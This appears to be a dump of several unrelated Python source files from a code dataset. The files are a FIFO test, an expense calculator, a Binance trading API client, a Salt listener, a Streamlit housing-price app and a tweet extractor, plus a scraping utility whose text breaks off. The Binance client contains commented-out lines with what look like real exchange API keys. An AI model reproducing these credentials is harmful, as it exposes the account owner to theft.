= BuyingStocks.objects.all().order_by('sequence').last()\n\n assert last_buying.count == 2555\n assert last_buying.is_complete_fifo_mapping is False\n assert last_buying.fifo_unmapping_count == 2555\n\n complete_mapping_count = TradingStocks.objects.filter(is_complete_fifo_mapping=True).count()\n uncomplete_mapping_count = TradingStocks.objects.filter(is_complete_fifo_mapping=False).count()\n\n assert complete_mapping_count == 10\n assert uncomplete_mapping_count == 3\n","sub_path":"stock/tests/test_유안타증권2_fifo_matching.py","file_name":"test_유안타증권2_fifo_matching.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191314104","text":"def total_gasto(lista):\n total = 0\n for valor in lista:\n total += valor\n return total\n\ndef calcular_percentual(lista, total):\n percentuais = []\n for i in range(len(lista)):\n percentuais.append((100 * lista[i]) // total)\n return percentuais\n\ndef maior_gasto(lista):\n indice = 0\n maior = lista[0]\n for i in range(len(lista)):\n if lista[i] > maior:\n maior = lista[i]\n indice = i\n return indice\n\ndef menor_gasto(lista):\n indice = 0\n menor = lista[0]\n for i in range(len(lista)):\n if lista[i] < menor:\n menor = lista[i]\n indice = i\n return indice\n\ndef saldo_mensal(total, salario):\n diferença = salario - total\n return diferença\n\ndef entradaCasa(valorCasa, economia):\n entrada = (valorCasa*10) / 100\n mensalidade = (entrada - economia) / 12\n return mensalidade\n\n# main\ngastos = [0, 0, 0, 0, 0]\nnomeGastos = [\"Contas Fixas\",\"Alimentação\",\"Lazer\",\"Vestuario\",\"Outros Gastos\"]\nvalorCasa = float(input(\"Qual o valor da casa que deseja comprar? \"))\nsalario = float(input(\"\\nQual o seu salario mensal? \"))\ncontinuar = True\n\nprint(\"\\nVamos começar a computar as contas, digite o valor depois o codigo numerico para informar o tipo de gasto.\")\nprint(\"Ps: O programa para de computar ao digitar um valor negativo.\")\nwhile continuar:\n valor = int(input(\"\\nQual o valor da conta? \"))\n if valor < 0:\n print(\"Você digitou um numero negativo, deseja encerrar o programa? S/N\")\n opcao = input()\n while opcao != 'S' and opcao != 'N':\n print(\"Opção invalida, tente novamente!\")\n opcao = input()\n if opcao == 'S':\n total = total_gasto(gastos)\n print(f\"O valor total de gastos no mês é de: R${total:.2f}\")\n percentual = calcular_percentual(gastos, total)\n for i in range(len(percentual)):\n print(f\"O tipo de gasto {nomeGastos[i]} equivale a {percentual[i]}% dos gastos mensais\")\n maiorGasto = maior_gasto(gastos)\n print(f\"A categoria com maior gasto no mês foi: {nomeGastos[maiorGasto]} com um total de R${gastos[maiorGasto]:.2f}\")\n menorGasto = menor_gasto(gastos)\n print(f\"A categoria com menor gasto no mês foi: {nomeGastos[menorGasto]} com um total de R${gastos[menorGasto]:.2f}\")\n saldoMensal = saldo_mensal(total, salario)\n mensalidade = 0\n if saldoMensal < 0:\n print(f\"Faltou R${saldoMensal*-1} para pagar todas as contas.\")\n mensalidade = entradaCasa(valorCasa, 0)\n elif saldoMensal == 0:\n print(\"Você conseguiu pagar todas as contas\")\n mensalidade = entradaCasa(valorCasa, 0)\n else:\n print(f\"Você economizou R${saldoMensal} nesse mês.\")\n mensalidade = entradaCasa(valorCasa, saldoMensal)\n print(f\"Desta forma se você economizar R${mensalidade:.2f} por mês conseguira o dinheiro necessario para dar entrada na casa dos sonhos\")\n continuar = False\n else:\n print(\"Vamos voltar a computador os gastos então.\")\n else:\n print(\"\\n1 - Contas Fixas\\n2 - Alimentação\\n3 - Lazer\\n4 - Vestuario\\n5 - Outros Gastos\")\n tipo = input(\"A qual tipo de gasto se refere esse valor? \")\n while not tipo.isnumeric() or int(tipo) < 1 or int(tipo) > 5:\n print(\"Opção invalida, tente novamente!\")\n tipo = input(\"A qual tipo de gasto se refere esse valor? \")\n tipo = int(tipo)\n gastos[tipo - 1] += valor","sub_path":"gastosMensais.py","file_name":"gastosMensais.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61299875","text":"import time\nimport json\nimport hmac\nimport hashlib\nfrom decimal import Decimal\nfrom json import JSONDecodeError\n\nimport requests\nfrom urllib.parse import urljoin, urlencode\nfrom enum import Enum\n\n# BASE_URL = 'https://api.binance.com'\n#\n# headers = {\n# 'X-MBX-APIKEY': API_KEY\n# }\nfrom api.exceptions import AbortException, RetryException, SynchronizeException\nfrom trade import log\nfrom trade.settings import bi_sec, bi_key\n\n\ndef get_non_scientific_value(value):\n if str(value).lower().__contains__(\"e\"):\n return format(value, '.8f')\n return value\n\n\nclass OrderStatus(Enum):\n LIMIT = 1\n MARKET = 2\n STOP_LOSS = 3\n STOP_LOSS_LIMIT = 4\n TAKE_PROFIT = 5\n TAKE_PROFIT_LIMIT = 6\n LIMIT_MAKER = 7\n\n\nclass SymbolStatus(Enum):\n PRE_TRADING = 1\n TRADING = 2\n POST_TRADING = 3\n END_OF_DAY = 4\n HALT = 5\n AUCTION_MATCH = 6\n BREAK = 7\n\n\nclass OCOStatus(Enum):\n RESPONSE = 1\n EXEC_STARTED = 2\n ALL_DONE = 3\n\n\nclass OCOOrderStatus(Enum):\n EXECUTING = 1\n ALL_DONE = 2\n REJECT = 3\n\n\n# print(OrderStatus.CANCELED.name == 'CANCELED')\n\nclass BinanceOrderType(Enum):\n LIMIT = 1\n MARKET = 2\n STOP_LOSS = 3\n TAKE_PROFIT = 4\n STOP_LOSS_LIMIT = 5\n TAKE_PROFIT_LIMIT = 6\n LIMIT_MAKER = 7\n\n\nclass BinanceOrderSide(Enum):\n BUY = \"BUY\"\n SELL = \"SELL\"\n\n\nclass TimeInForce(Enum):\n GTC = 1\n IOC = 2\n FOK = 3\n\n\nclass BinanceException(Exception):\n status_code = 0\n message = \"\"\n code = 0\n\n @classmethod\n def raise_if_matches(cls, status_code, code, message, exception_message):\n if cls.status_code == status_code and message.__contains__(cls.message):\n raise cls(status_code, code, message, exception_message)\n\n def __init__(self, status_code, code, message, exception_message):\n self.status_code = status_code\n self.code = code\n self.message = message\n self.status_code = status_code\n\n super().__init__(exception_message)\n\n\nclass BinanceInsufficientBalanceException(BinanceException, AbortException):\n status_code = 400\n code = -2010\n message = \"Account has insufficient balance for requested action.\"\n\n\nclass BinanceDuplicateOrderSent(BinanceException, AbortException):\n status_code = 400\n code = -2010\n message = \"Duplicate order sent.\"\n\n\nclass BinanceOrderDoesNotExistException(BinanceException, AbortException):\n status_code = 400\n code = -2013\n message = \"Order does not exist.\"\n\n\nclass BinanceWindowTimeException(BinanceException, RetryException):\n status_code = 400\n code = -1021\n message = \"Timestamp for this request is outside of the recvWindow.\"\n\n\nclass BinanceUnknownOrderSent(BinanceException, SynchronizeException):\n status_code = 400\n code = -2011\n message = \"Unknown order sent.\"\n\n\n# delete non existing or deleted order\n# {'code': -2011, 'msg': 'Unknown order sent.', 'status_code': 400}\n\nclass BinanceInternalError(BinanceException, RetryException):\n status_code = 500\n code = -1001\n # message = 'Internal error; unable to process your request. Please try again.'\n message = 'Internal error'\n\n\nclass BinanceInvalidQuantity(BinanceException):\n status_code = 400\n code = -1013\n message = 'Invalid quantity.'\n\n\ndef binance_exception_dispatcher(response):\n status_code = response.status_code\n try:\n data = response.json()\n except JSONDecodeError:\n data = None\n\n if data:\n code = data['code']\n message = data['msg']\n else:\n data = {}\n code = 0\n message = \"\"\n\n data['status_code'] = status_code\n exception_message = data\n\n BinanceInsufficientBalanceException.raise_if_matches(status_code, code, message, exception_message)\n BinanceOrderDoesNotExistException.raise_if_matches(status_code, code, message, exception_message)\n BinanceWindowTimeException.raise_if_matches(status_code, code, message, exception_message)\n BinanceDuplicateOrderSent.raise_if_matches(status_code, code, message, exception_message)\n BinanceUnknownOrderSent.raise_if_matches(status_code, code, message, exception_message)\n BinanceInternalError.raise_if_matches(status_code, code, message, exception_message)\n BinanceInvalidQuantity.raise_if_matches(status_code, code, message, exception_message)\n raise BinanceException(status_code, code, message, exception_message)\n\n\n# api.binance_api.BinanceException: 400 [-2010] Account has insufficient balance for requested action.\n\n# def get_server_time(BASE_URL=BASE_URL):\n# PATH = '/api/v1/time'\n# params = None\n#\n# timestamp = int(time.time() * 1000)\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, params=params)\n# if r.status_code == 200:\n# # print(json.dumps(r.json(), indent=2))\n# data = r.json()\n# print(f\"diff={timestamp - data['serverTime']}ms\")\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_price(symbol='BTCUSDT', BASE_URL=BASE_URL):\n# PATH = '/api/v3/ticker/price'\n# params = {\n# 'symbol': symbol\n# }\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, headers=headers, params=params)\n# if r.status_code == 200:\n# print(json.dumps(r.json(), indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_order_book():\n# PATH = '/api/v1/depth'\n# params = {\n# 'symbol': 'BTCUSDT',\n# 'limit': 5\n# }\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, headers=headers, params=params)\n# if r.status_code == 200:\n# print(json.dumps(r.json(), indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# # get_price(symbol='BNBBTC')\n#\n#\n# def order(symbol, side, type, quantity, price, newClientOrderId, BASE_URL=BASE_URL):\n# PATH = '/api/v3/order'\n# timestamp = int(time.time() * 1000)\n# params = {\n# 'symbol': symbol,\n# 'side': side,\n# 'type': type,\n# 'timeInForce': 'GTC',\n# 'newClientOrderId': newClientOrderId,\n# 'quantity': quantity,\n# 'price': price,\n# 'recvWindow': 5000,\n# 'timestamp': timestamp\n# }\n# # params = {\n# # 'symbol': 'BTCUSD',\n# # 'side': 'SELL',\n# # 'type': 'LIMIT',\n# # 'timeInForce': 'GTC',\n# # 'quantity': 0.1,\n# # 'price': 500.0,\n# # 'recvWindow': 5000,\n# # 'timestamp': timestamp\n# # }\n#\n# query_string = urlencode(params)\n# params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.post(url, headers=headers, params=params)\n# if r.status_code == 200:\n# data = r.json()\n# print(json.dumps(data, indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# def get_order(symbol, newClientOrderId, BASE_URL=BASE_URL):\n# PATH = '/api/v3/order'\n# timestamp = int(time.time() * 1000)\n# params = {\n# 'symbol': symbol,\n# # 'orderId': orderId,\n# 'newClientOrderId': newClientOrderId,\n# 'recvWindow': 5000,\n# 'timestamp': timestamp\n# }\n#\n# # params = {\n# # 'symbol': symbol,\n# # 'orderId': '336683281',\n# # 'recvWindow': 5000,\n# # 'timestamp': timestamp\n# # }\n#\n# query_string = urlencode(params)\n# params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.get(url, headers=headers, params=params)\n# if r.status_code == 200:\n# data = r.json()\n# print(json.dumps(data, indent=2))\n# else:\n# binance_exception_dispatcher(r)\n#\n#\n# ############################\n# def delete_order(symbol, newClientOrderId, orderId=None, BASE_URL=BASE_URL):\n# PATH = '/api/v3/order'\n# timestamp = int(time.time() * 1000)\n# params = {\n# 'symbol': symbol,\n# # 'orderId': orderId,\n# 'newClientOrderId': newClientOrderId,\n# 'recvWindow': 5000,\n# 'timestamp': timestamp\n# }\n#\n# query_string = urlencode(params)\n# params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'), hashlib.sha256).hexdigest()\n#\n# url = urljoin(BASE_URL, PATH)\n# r = requests.delete(url, headers=headers, params=params)\n# if r.status_code == 200:\n# data = r.json()\n# print(json.dumps(data, indent=2))\n# else:\n# binance_exception_dispatcher(r)\n\n\nclass Binance:\n\n def __init__(self, public_key, private_key):\n self.public_key = public_key\n self.private_key = private_key\n # self.public_key = 'fAgYeGrf1NtM0CQTN978mMWsmMwbieaWYpWeBsdoD9IRTjHzkagfoi5wMj3FFz3J'\n # self.private_key = 'G1P3yQxBO8cdgi2drwUCly9pjyKGbDCfUo1V8pWeg853IqaDWlZGGka2IdlLZ3Ck'\n self.BASE_URL = 'https://api.binance.com'\n self.headers = {\n 'X-MBX-APIKEY': self.public_key\n }\n\n def market_order(self, symbol, quantity, new_client_order_id, side):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'side': side,\n 'type': BinanceOrderType.MARKET.name,\n 'newClientOrderId': new_client_order_id,\n 'quantity': quantity,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n url = urljoin(self.BASE_URL, PATH)\n r = requests.post(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # executedQty\n def limit_order(self, symbol, price, quantity, new_client_order_id, side):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n price = get_non_scientific_value(price)\n params = {\n 'symbol': symbol,\n 'side': side,\n 'type': BinanceOrderType.LIMIT.name,\n 'timeInForce': 'GTC',\n 'newClientOrderId': new_client_order_id,\n 'quantity': quantity,\n 'price': price,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n url = urljoin(self.BASE_URL, PATH)\n r = requests.post(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # def stop_market_order(self, symbol, stop_price, quantity, newClientOrderId, side=OrderSide.BUY.name):\n # PATH = '/api/v3/order'\n # timestamp = int(time.time() * 1000)\n # params = {\n # 'symbol': symbol,\n # 'side': side,\n # 'type': OrderType.STOP_LOSS.name,\n # 'newClientOrderId': newClientOrderId,\n # 'quantity': quantity,\n # 'stopPrice': stop_price,\n # 'recvWindow': 5000,\n # 'timestamp': timestamp\n # }\n # query_string = urlencode(params)\n # params['signature'] = hmac.new(SECRET_KEY.encode('utf-8'), query_string.encode('utf-8'),\n # hashlib.sha256).hexdigest()\n # url = urljoin(self.BASE_URL, PATH)\n # r = requests.post(url, headers=headers, params=params)\n # if r.status_code == 200:\n # data = r.json()\n # print(json.dumps(data, indent=2))\n # else:\n # binance_exception_dispatcher(r)\n\n def stop_limit_order(self, symbol, price, stop_price, quantity, newClientOrderId, side):\n price = get_non_scientific_value(price)\n stop_price = get_non_scientific_value(stop_price)\n quantity = float(quantity)\n symbol = symbol.__str__()\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'side': side,\n 'type': BinanceOrderType.STOP_LOSS_LIMIT.name,\n 'timeInForce': 'GTC',\n 'newClientOrderId': newClientOrderId,\n 'quantity': quantity,\n 'price': price,\n 'stopPrice': stop_price,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n url = urljoin(self.BASE_URL, PATH)\n r = requests.post(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n def get_price(self, symbol):\n PATH = '/api/v3/ticker/price'\n params = {\n 'symbol': symbol\n }\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n # print(json.dumps(r.json(), indent=2))\n return float(r.json()['price'])\n else:\n binance_exception_dispatcher(r)\n\n def get_current_position(self):\n PATH = '/sapi/v1/capital/config/getall'\n timestamp = int(time.time() * 1000)\n print(str(timestamp))\n params = {\n 'recvWindow': 5000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # def amend_stop_limit_order(self):\n # pass\n\n def delete_order(self, symbol, origClientOrderId):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n # 'orderId': orderId,\n 'origClientOrderId': origClientOrderId,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.delete(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n log.debug_daily(data)\n return data\n # print(json.dumps(data, indent=2))\n else:\n binance_exception_dispatcher(r)\n\n def get_all_open_orders(self, symbol):\n PATH = '/api/v3/openOrders'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n log.debug_daily(data)\n return data\n else:\n binance_exception_dispatcher(r)\n\n def get_asset_amount(self, asset):\n r = self.get_user_commission()\n balances = r['balances']\n for balance in balances:\n if asset.__eq__(balance['asset']):\n return Decimal(balance['free'])\n raise ValueError(\"This asset was not found on Binance response\")\n\n def get_order_by_client_order_id(self, symbol, client_order_id):\n PATH = '/api/v3/order'\n timestamp = int(time.time() * 1000)\n params = {\n 'symbol': symbol,\n 'origClientOrderId': client_order_id,\n 'recvWindow': 15000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n # {\n # \"makerCommission\": 15, #==0.15%\n # \"takerCommission\": 15,\n # \"buyerCommission\": 0,\n # \"sellerCommission\": 0,\n # \"canTrade\": true,\n # \"canWithdraw\": true,\n # \"canDeposit\": true,\n # \"updateTime\": 123456789,\n # \"accountType\": \"SPOT\",\n # \"balances\": [\n # {\n # \"asset\": \"BTC\",\n # \"free\": \"4723846.89208129\",\n # \"locked\": \"0.00000000\"\n # },\n # {\n # \"asset\": \"LTC\",\n # \"free\": \"4763368.68006011\",\n # \"locked\": \"0.00000000\"\n # }\n # ]\n # }\n def get_user_commission(self):\n PATH = '/api/v3/account'\n timestamp = int(time.time() * 1000)\n params = {\n 'recvWindow': 5000,\n 'timestamp': timestamp\n }\n\n query_string = urlencode(params)\n params['signature'] = hmac.new(self.private_key.encode('utf-8'), query_string.encode('utf-8'),\n hashlib.sha256).hexdigest()\n\n url = urljoin(self.BASE_URL, PATH)\n r = requests.get(url, headers=self.headers, params=params)\n if r.status_code == 200:\n data = r.json()\n # print(json.dumps(data, indent=2))\n return data\n else:\n binance_exception_dispatcher(r)\n\n def delete_all_orders(self, symbol):\n orders = self.get_all_open_orders(symbol)\n for i in orders:\n self.delete_order(i['symbol'], i['clientOrderId'])\n\n\n# from trade.settings import binance_private_key, binance_public_key\n\n# amir = Binance(public_key=binance_public_key, private_key=binance_private_key)\n# amir.get_user_comissiomn()\n# print(amir.get_current_position())\n# don't use amir.stop_market_order('BTCUSDT', 2000, .005, \"hassan1234\", side=OrderSide.SELL.name)\n# print(amir.limit_order('BTCUSDT', 10000, 0.01, \"amir32421\", side=BinanceOrderSide.BUY.value))\n# print(amir.market_order(symbol='BTCUSDT', quantity=0.001133, new_client_order_id=\"amir32421\",\n# side=BinanceOrderSide.SELL.value))\n# {'symbol': 'BTCUSDT', 'orderId': 2807755477, 'orderListId': -1, 'clientOrderId': 'amir32421',\n# 'price': '9200.00000000', 'origQty': '0.00113300', 'executedQty': '0.00000000', 'cummulativeQuoteQty': '0.00000000',\n# 'status': 'NEW', 'timeInForce': 'GTC', 'type': 'LIMIT', 'side': 'BUY', 'stopPrice': '0.00000000',\n# 'icebergQty': '0.00000000', 'time': 1596274492503, 'updateTime': 1596274492503, 'isWorking': True,\n# 'origQuoteOrderQty': '0.00000000'}\n\n# {\n# \"symbol\": \"BTCUSDT\",\n# \"orderId\": 2808309613,\n# \"orderListId\": -1,\n# \"clientOrderId\": \"amir32421\",\n# \"transactTime\": 1596277898879,\n# \"price\": \"0.00000000\",\n# \"origQty\": \"0.00113300\",\n# \"executedQty\": \"0.00113300\",\n# \"cummulativeQuoteQty\": \"13.20812878\",\n# \"status\": \"FILLED\",\n# \"timeInForce\": \"GTC\",\n# \"type\": \"MARKET\",\n# \"side\": \"SELL\",\n# \"fills\": [\n# {\n# \"price\": \"11657.66000000\",\n# \"qty\": \"0.00113300\",\n# \"commission\": \"0.00047283\",\n# \"commissionAsset\": \"BNB\",\n# \"tradeId\": 370100694\n# }\n# ]\n# }\n\n\n# print(amir.get_order_by_client_order_id('BTCUSDT', \"amir32421\"))\n# print(amir.delete_order(symbol='BTCUSDT', origClientOrderId=\"amir32421\"))\n# print(amir.get_asset_amount(\"BTC\"))\n# print(json.dumps(a, indent=4, sort_keys=True))\n# console.log(binance.roundStep(quantity, symbol); // Returns 8\n\n# for i in range(0, 1, 1):\n# print(i)\n# if orders[i] is not None and orders[i]['clientOrderId'] is not None:\n# amir.delete_order(orders[i]['symbol'], orders[i]['clientOrderId'])\n\n# amir = Binance(public_key=bi_key, private_key=bi_sec)\n# amir.stop_limit_order('BTCUSDT', 5000, 5000, 0.002, \"amir4r2\", side=OrderSide.SELL.name)\n# amir.market_order('BNBBTC', 0.06, 'order-10', side=BinanceOrderSide.BUY.name)\n# amir.limit_order('ATOMUSDT', 4.35000000, 2.38400000, \"order1455\", side=BinanceOrderSide.BUY.value)\n# amir.delete_order(\"ATOMUSDT\", 'order1455')\n","sub_path":"api/binance_api.py","file_name":"binance_api.py","file_ext":"py","file_size_in_byte":21395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"564875283","text":"import salt.config\nimport salt.utils.event\n\nETC_SALT_MASTER = \"/etc/salt/master\"\n\n\nclass SaltListener:\n def __init__(self, timeout=None):\n opts = salt.config.client_config(ETC_SALT_MASTER)\n self.listener = salt.utils.event.get_event(\n \"master\",\n sock_dir=opts[\"sock_dir\"],\n transport=opts[\"transport\"],\n opts=opts,\n raise_errors=True,\n )\n if timeout is None:\n self.timeout_secs = 0\n else:\n self.timeout_secs = timeout.total_seconds()\n\n def __iter__(self):\n while True:\n yield self.listener.get_event(wait=self.timeout_secs, full=True)\n","sub_path":"salt/schedule-commands/salt_listener.py","file_name":"salt_listener.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"537140312","text":"# Import Libraries\r\nfrom numpy.testing._private.utils import IgnoreException\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom streamlit.proto.DataFrame_pb2 import Float64Index\r\n\r\n# Title\r\nst.write(\"\"\"\r\n# Boston House Prediction 🏠\r\n\"\"\")\r\n\r\n# Load Boston Dataset\r\nboston = datasets.load_boston()\r\nX = pd.DataFrame(boston.data, columns=boston.feature_names)\r\ny = pd.DataFrame(boston.target, columns=['House Median Value'])\r\n\r\n# Sidebar\r\nst.sidebar.header('Features')\r\n\r\n\r\ndef features():\r\n CRIM = st.sidebar.slider('Crime Rate (per capita)', 0.00, 88.98)\r\n ZN = st.sidebar.slider('Residential Zone (sq.ft)', 0.00, 100.00)\r\n INDUS = st.sidebar.slider('Industrial Zone (sq.ft)', 0.46, 27.74)\r\n CHAS = st.sidebar.slider('Charles River', 0.00, 1.00)\r\n NOX = st.sidebar.slider('Nitrogen Oxide Concentration', 0.38, 0.87)\r\n RM = st.sidebar.slider('Average Number of Rooms', 3.56, 8.78)\r\n AGE = st.sidebar.slider('Age of House', 2.90, 100.00)\r\n DIS = st.sidebar.slider(\r\n 'Distance from 5 Boston Employment Centres', 1.12, 12.12)\r\n RAD = st.sidebar.slider('Accessibility to Radial Highways', 1.00, 24.00)\r\n TAX = st.sidebar.slider('Property Tax Rate ($)', 187.00, 771.00)\r\n PTRATIO = st.sidebar.slider('Pupil Teacher Ratio', 12.60, 22.00)\r\n B = st.sidebar.slider('Proportion of Blacks', 0.32, 396.90)\r\n LSTAT = st.sidebar.slider('Lower Status of Population (%)', 1.73, 37.97)\r\n data = {'CRIM': CRIM,\r\n 'ZN': ZN,\r\n 'INDUS': INDUS,\r\n 'CHAS': CHAS,\r\n 'NOX': NOX,\r\n 'RM': RM,\r\n 'AGE': AGE,\r\n 'DIS': DIS,\r\n 'RAD': RAD,\r\n 'TAX': TAX,\r\n 'PTRATIO': PTRATIO,\r\n 'B': B,\r\n 'LSTAT': LSTAT}\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\n\r\n\r\ndf = features()\r\n\r\nst.header('Features')\r\nst.write(df)\r\n\r\n# Data Description\r\ndata = {\r\n 'Data': ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'BLACK', 'LSTAT', 'MEDV'],\r\n 'Description': ['Crime Rate', 'Residential Zone', 'Industrial Zone', 'Charles River', 'Nitrogen Oxide Concentration', 'Average Number of Rooms', 'Age of House', 'Distance to 5 Boston Employment Centres', 'Accessibility to Radial Highways', 'Property Tax Rate', 'Pupil Teacher Ratio', 'Proportion of Black', 'Lower Status of Population', 'Median Value of Owner Occupied Homes']\r\n}\r\n\r\ndescription = pd.DataFrame(data)\r\n\r\nst.subheader('Data Description')\r\nst.write(description)\r\n\r\n# Import Model\r\nmodel = pickle.load(open('Regression_Model.pkl', 'rb'))\r\n\r\n# Make Prediction\r\nst.header('Prediction')\r\nst.write(f'Median Value of Owner Occupied Home : {model.predict(df)}')\r\n","sub_path":"Boston Housing Regression/House_Price_Regression.py","file_name":"House_Price_Regression.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"232347464","text":"import datetime as dt\nimport configparser\nimport sys\nfrom DAO.twitter import Twitter\nfrom DAO.mongo import Mongo\nfrom pymongo.errors import DuplicateKeyError\n\ndef main(config_file, since=dt.datetime.now().strftime(\"%Y-%m-%d\")):\n config = configparser.RawConfigParser()\n config.read(config_file)\n\n twitter = Twitter(config_file)\n mongo = Mongo(config_file)\n mg_client = mongo.connect()\n tweets_to_classify = mg_client.datapop.tweets_to_classify\n\n players = config.get('data', 'players').split(',')\n print(players)\n\n for player in players:\n tweets = twitter.getTweetsOfPlayer(player, since)\n print(\"{}:\\n\".format(player))\n for tweet in tweets:\n try:\n tweets_to_classify.insert_one(tweet)\n except DuplicateKeyError:\n pass\n #tweets_to_classify.insert_many(tweets)\n\nif __name__ == '__main__':\n if len(sys.argv) >= 3:\n main(sys.argv[1], sys.argv[2])\n elif len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print('Indique um arquivo de configuração!')\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"597746465","text":"\"\"\" \nCMScraping utility class: UtilScraping\nAuthor: Wells Zhang\nDatetime: 2017-4-29 \n\"\"\"\n\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom Entities.ScrapingRule import ScrapingRule\nfrom Entities.Url import UrlAccessHistory\nfrom globalutilities import UTIL_LOG, UTIL_DB\nfrom globalvars import *\n\n\n# Utility class for web scraping operation\nclass UtilScraping:\n \"\"\" Utility class for scraping operation \"\"\"\n _doc_blacklist = None\n _scraping_rule = None\n\n def __init__(self):\n \"\"\"\n Scraping utility class to help do web scraping operations.\n :return:\n \"\"\"\n return\n\n # Blacklist operation methods\n def get_url_blacklist(self):\n \"\"\"\n Get the url blacklist\n :return: Document list\n \"\"\"\n if self._doc_blacklist is None:\n self._doc_blacklist = UTIL_DB.find(COL_BLACKLIST, query_filter={'status': 'Active'})\n\n return self._doc_blacklist\n\n def refresh_url_blacklist(self):\n \"\"\"\n Reload the url blacklist to refresh the latest content.\n :return: None\n \"\"\"\n self._doc_blacklist = UTIL_DB.find(COL_BLACKLIST, query_filter={'status': 'Active'})\n\n def exits_in_url_blacklist(self, url):\n \"\"\"\n Check if specific url in the blacklist\n :param url: True for exists and False for not found\n :return: \n \"\"\"\n for blacklist_item in self.get_url_blacklist():\n if re.search(blacklist_item['url'], url) is not None:\n return True\n\n return False\n\n # Routine URL operations\n def get_routine_urls(self):\n \"\"\"\n Fetch the target url list from database\n \"\"\"\n\n # The data structure of collection RoutineUrlList as below\n # {\n # \"_id\" : ObjectId(\"58ca0635f5e5454a930515a9\"),\n # \"url\" : 